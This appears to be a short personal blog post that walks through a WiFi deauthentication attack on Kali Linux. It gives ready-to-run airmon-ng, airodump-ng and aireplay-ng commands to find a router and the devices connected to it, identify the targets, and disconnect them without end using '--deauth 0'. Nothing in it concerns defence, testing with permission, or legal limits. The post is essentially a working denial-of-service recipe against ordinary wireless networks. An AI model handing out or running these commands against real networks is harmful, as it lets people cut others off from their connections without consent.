Skip to main content
Rohan's blog

Wifi Deauthentication attack on Kali linux

You might have to run these as sudo (root). Also, do not be alarmed if your computer does not find your wifi card. A clean reboot will solve the issue.

  1. Get the name if your wireless card : the only one with information.
iwconfig

Mine was wlp2s0.

  1. Put the boi is monitor mode. This is to allow it to monitor network traffic.
airmon-ng start wlp2s0
  1. Run iwconfig again. It should now have a mon at the end. Mine became wlp2s0mon.
  2. Run the following to see the list of routers and their corresponding WiFi names. Note the BSSID( thatā€™s the Mac address) of the network of choice, and itā€™s channel (CH).
airodump-ng wlp2s0mon
  1. Run the following to see the devices connected to this WiFi. These appear under ā€œStationā€. Itā€™s the mac address of the device.
airodump-ng wlan0mon --bssid [routers BSSID here]--channel [routers channel here]

To find out what the device is, google the first 3 sections of the deviceā€™s mac address, and you can see the device manufacturer info and hence be able to identify the device.

  1. Deauth! Run:
aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlp2s0mon

0 is for infinite attacks, until manually stopped. Specify a number of choice for finite number of attacks.

References: #

This cool hackernoon article.